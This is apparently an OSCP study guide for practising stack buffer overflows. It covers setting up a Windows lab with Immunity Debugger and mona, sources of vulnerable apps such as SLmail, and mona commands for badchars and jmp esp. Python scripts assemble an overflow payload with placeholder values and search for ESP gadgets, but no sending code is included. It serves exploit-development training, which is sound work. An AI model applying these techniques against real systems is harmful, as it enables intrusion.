BoF OSCP Style Study Series
While studying for the OSCP, I found that most people recommend the following base applications for practicing BoF:
- SLmail 5.5;
- Brainpan;
- The TryHackMe binary with 10 OSCP-style BoFs;
- The binaries on the OSCP lab's study machine;
- The “storageserver” binary available on the OSCP lab machine LP07.
The fastest way to start practicing is to set up a local lab: basically a Windows 7 machine with the vulnerable applications installed, the firewall and antivirus disabled, and the runtime analysis tools in place. This avoids the headaches of VPNs and slow VMs from online lab services, and most of the apps named above are easy to find and install anywhere.
Setting up the environment
To build the machine, Microsoft lets you download a ready-made VM from the link; you just need to do the following:
- Disable Windows Update and the firewall;
- Assign a fixed IP (optional).
To install the analysis tools, that is, Immunity Debugger and mona, download Immunity here and mona from GitHub here. The Immunity Debugger installer installs Python 2.7 at the end of the installation, so you don't need to download anything else. mona.py must be copied into the “PyCommands” folder inside the Immunity Debugger installation directory; once Immunity is restarted, the !mona commands become available in its command bar. With this we already have a very functional local lab environment.
Getting vulnerable applications
Some applications are easy to get directly from the vendor's website or from exploit-db, but others are not. To obtain “storageserver” you need access to the OSCP lab VPN, or you must ask a colleague who has access to download and share it; the same goes for the binaries on the OSCP lab's study machine. So it is highly recommended to take advantage of your OSCP lab VPN time to download all of these applications, which are there precisely for students to download. For the TryHackMe binary, I recommend writing the SLmail 5.5 exploit locally first, then connecting to the TryHackMe VPN, starting the VM from the BoF series at this link, installing the SLmail that is on the VM, exploiting the service and exfiltrating the OSCP.exe binary and its DLL.
BoF information and technical guides
I really like S4vitar's tips. He is a Spanish hacker, and I don't think his explanation of BoF is too difficult to understand; besides being documented at this link (along with all his general OSCP tips), you can also watch his step-by-step video, from setting up the environment to compromising the system with the exploit written for the BoF.
The TryHackMe BoF series itself is at this link, and it also explains BoF step by step. The whole procedure seems to me very well explained in “task 2”, which details how the binary I mentioned before works and exploits it without giving away the buffer sizes or return addresses, since those are the questions of the activity that the student must find.
The penetration tester M0chan has a well-explained and technically detailed guide here, along with some examples of vulnerable applications.
Finally, the OSCP material itself covers BoF quite completely and details the exploitation step by step.
Extras
As an extra, it's worth mentioning some useful commands when writing the BoF exploit.
To convert the return address so it can be appended directly to our buffer, it's a good idea to use the following lines in Python:
from struct import pack  # add in the import section
addr_return = pack('<L', 0x000000)  # exchange the 000000 for the return address found
With these two lines it is no longer necessary to write the address backwards and prefix each byte with “\x”: the '<L' format packs the 32-bit address as four little-endian bytes, which is the byte order an x86 process expects on the stack. In Python 2 (the version Immunity ships) pack returns a str, so it concatenates directly with the rest of the buffer; in Python 3 it returns bytes, so the junk and shellcode must be bytes too.
When looking for badchars, many people prefer to do the process manually, and there is nothing wrong with that, but I recommend doing a final check with mona. For that, we use the following commands:
!mona config -set workingfolder C:\Users\meuUser\Desktop\%p
# create mona's working directory (%p expands to the name of the debugged process)
!mona bytearray -b "\x00"
# create the badchar array, already excluding the badchars found so far
!mona compare -f C:\Users\meuUser\Desktop\appName\bytearray.bin -a ADDR
# compare the array in memory with the file and check that there are no more badchars
First we create mona's working directory, in which mona generates the badchar array (bytearray.bin) that it later compares against memory; because of the %p placeholder, “appName” in the compare path is the name of the executable being debugged. It is important to note that in the third command the value ADDR is the address in memory of the first byte of the badchar array, typically the value of ESP when the array is placed right after the return address. Each time mona reports a corrupted byte, add it to the -b list, regenerate the array and repeat the test, because a bad byte often truncates or shifts everything that follows it and hides the later ones. For more details, this link has a more complete explanation, and the TryHackMe series also covers this subject.
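The following Python 3 script is an added example, not code from the original article or from mona: it does in plain Python what the struct.pack lines and the mona bytearray/compare commands above do, so the mechanics are visible. The offset, return address and the INT3 shellcode stub are constructed placeholder values (in practice you obtain them with pattern_create/pattern_offset and "!mona jmp -r esp"), and the “memory dump” is a constructed byte string standing in for what you would read out of Immunity at ESP.

```python
from struct import pack

# Constructed placeholder values (assumptions for this example, not from the
# article): a student would find the offset with pattern_create/pattern_offset
# and the return address with "!mona jmp -r esp".
OFFSET = 2606
RET_ADDR = 0x5f4a358f
SHELLCODE_STUB = b"\xcc" * 8   # INT3 breakpoints: the debugger stops if EIP reaches them


def packed_return(addr):
    """pack('<L') emits the 4 bytes of a 32-bit address in little-endian
    order, which is what x86 expects on the stack; it replaces writing
    b"\\xaf\\x11\\x50\\x62" by hand for 0x625011af."""
    return pack('<L', addr)


def badchar_array(exclude=b"\x00"):
    """The array '!mona bytearray -b "..."' writes to bytearray.bin: every
    byte 0x00..0xff in order, minus the bytes already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(sent, observed):
    """The check '!mona compare -f bytearray.bin -a ADDR' performs: walk the
    array we sent next to the bytes read back from memory at ADDR and return
    the first byte that was altered or truncated, or None if memory matches.
    Only the first mismatch is reported because a bad byte frequently
    truncates or shifts everything after it, so later differences are not
    meaningful until it is removed and the test is repeated."""
    for s, o in zip(sent, observed):
        if s != o:
            return s
    if len(observed) < len(sent):
        return sent[len(observed)]   # the array was cut off at this byte
    return None


def build_payload(offset, ret, shellcode, badchars, nops=16):
    """Junk + little-endian return address + NOP sled + shellcode, refusing
    to build if the address or the shellcode contains a known bad byte
    (a bad byte in either one silently breaks the exploit)."""
    for b in badchars:
        if b in packed_return(ret):
            raise ValueError("return address contains bad byte 0x%02x" % b)
        if b in shellcode:
            raise ValueError("shellcode contains bad byte 0x%02x" % b)
    return b"A" * offset + packed_return(ret) + b"\x90" * nops + shellcode


if __name__ == "__main__":
    # Constructed "memory dump": the application dropped every byte from
    # 0x0a onward (a classic \n truncation in a line-based protocol).
    sent = badchar_array(b"\x00")
    dump = sent[:sent.index(0x0a)]
    print("first bad byte: 0x%02x" % first_badchar(sent, dump))
    payload = build_payload(OFFSET, RET_ADDR, SHELLCODE_STUB, b"\x00\x0a")
    print("payload length: %d bytes" % len(payload))
```

Sending the payload (the socket code) is left out on purpose; it is the same as in any of the guides linked above. The useful habit here is the refusal in build_payload: once the badchar list is final, run every candidate return address and the generated shellcode through it before sending anything.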
Finally, when looking for the return address, mona can again give you a little help with the following command:
!mona jmp -r esp -cpb "\x00\x07"
With the previous command, mona searches the loaded modules for a jmp esp instruction whose address does not contain the badchars given to -cpb (the filter is applied to the bytes of the address itself, since that is what ends up in the buffer). From the results, pick an address in a module whose ASLR and Rebase flags are False in mona's output; otherwise the address can change between runs and the exploit will only work once.
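As an added example, not from the original article or from the mona project, the same search written in Python 3 over a constructed module image, to make explicit what the -cpb filter checks: the little-endian bytes of each candidate address, not the instruction. The module bytes, base address and gadget offsets below are constructed for the example; a real DLL would be read from disk and the base taken from Immunity's module list.

```python
from struct import pack

# x86 encodings that transfer execution to ESP; "!mona jmp -r esp" looks
# for these (among others) in the loaded modules.
ESP_GADGETS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def find_esp_gadgets(image, base, badchars=b""):
    """Return (address, mnemonic) for every ESP gadget in `image`, the raw
    bytes of a module loaded at `base`, keeping only addresses whose
    little-endian encoding contains none of `badchars` (the -cpb filter).
    Unlike mona this scans a byte blob we pass in, not a live process."""
    hits = []
    for opcode, name in ESP_GADGETS.items():
        pos = image.find(opcode)
        while pos != -1:
            addr = base + pos
            if not any(b in pack('<L', addr) for b in badchars):
                hits.append((addr, name))
            pos = image.find(opcode, pos + 1)
    return sorted(hits)


# Constructed module image (assumption, not a real DLL): 8 KiB of zeros with
# three JMP ESP and one PUSH ESP; RET planted at chosen offsets.
BASE = 0x62500000
MODULE = bytearray(0x2000)
MODULE[0x0007:0x0009] = b"\xff\xe4"   # 0x62500007 -> packs to 07 00 50 62 (bad)
MODULE[0x0100:0x0102] = b"\xff\xe4"   # 0x62500100 -> packs to 00 01 50 62 (bad)
MODULE[0x11af:0x11b1] = b"\xff\xe4"   # 0x625011af -> packs to af 11 50 62 (clean)
MODULE[0x1c40:0x1c42] = b"\x54\xc3"   # 0x62501c40 -> packs to 40 1c 50 62 (clean)
MODULE = bytes(MODULE)

if __name__ == "__main__":
    for addr, name in find_esp_gadgets(MODULE, BASE, b"\x00\x07"):
        print("0x%08x  %s" % (addr, name))
```

The two gadgets that survive the b"\x00\x07" filter are exactly the ones a student could paste into addr_return; the other two would be found by a plain opcode search but are useless here because their address bytes get mangled by the target.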
Finally, I know that, depending on the applications being studied, some extra settings must be made, but since the goal was to create a basic, fast and useful environment focused on studying for the OSCP exam, I didn't feel the need for more advanced settings; the configuration described here fulfills that objective satisfactorily.
I would like to thank Microsoft for making the VMs available for free, the folks at TryHackMe for creating the BoF series, and S4vitar for sharing his experiences with the OSCP exam.